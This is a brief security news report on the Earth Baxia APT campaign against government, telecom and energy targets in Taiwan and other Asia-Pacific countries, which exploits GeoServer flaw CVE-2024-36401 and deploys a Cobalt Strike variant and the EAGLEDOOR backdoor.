A Chinese-linked advanced persistent threat (APT), identified as Earth Baxia, has been targeting government organizations in Taiwan and other Asia-Pacific (APAC) nations by exploiting a critical vulnerability in OSGeo GeoServer GeoTools, recently patched in 2024. According to Trend Micro, the cyberattacks, first detected in July 2024, resemble tactics previously attributed to APT41, particularly through the use of Cobalt Strike command-and-control (C2) domains imitating major cloud services like Amazon Web Services and Microsoft Azure.
The ultimate objective of the attack is to deploy a customized Cobalt Strike variant, which serves as a platform to load the EAGLEDOOR backdoor. The EAGLEDOOR malware utilizes multiple communication protocols, including DNS, HTTP, TCP, and Telegram, with the Telegram Bot API being used to manage files and execute additional payloads. Stolen data is exfiltrated using curl.exe.
Researchers pointed out that Earth Baxia has been conducting a sophisticated campaign primarily targeting government, telecommunications, and energy sectors in countries like the Philippines, South Korea, Vietnam, Taiwan, and Thailand. The attack methods include spear-phishing emails and exploiting the GeoServer vulnerability (CVE-2024-36401, CVSS score: 9.8).
This multi-stage attack chain incorporates techniques like AppDomainManager injection and GrimResource to bypass security measures and deploy further malicious payloads, such as the previously unknown EAGLEDOOR backdoor, allowing for data theft and continued malicious activity.
The discovery of phishing emails and decoy documents written in Simplified Chinese suggests that China may also be among the affected nations, though the exact sectors targeted remain unclear.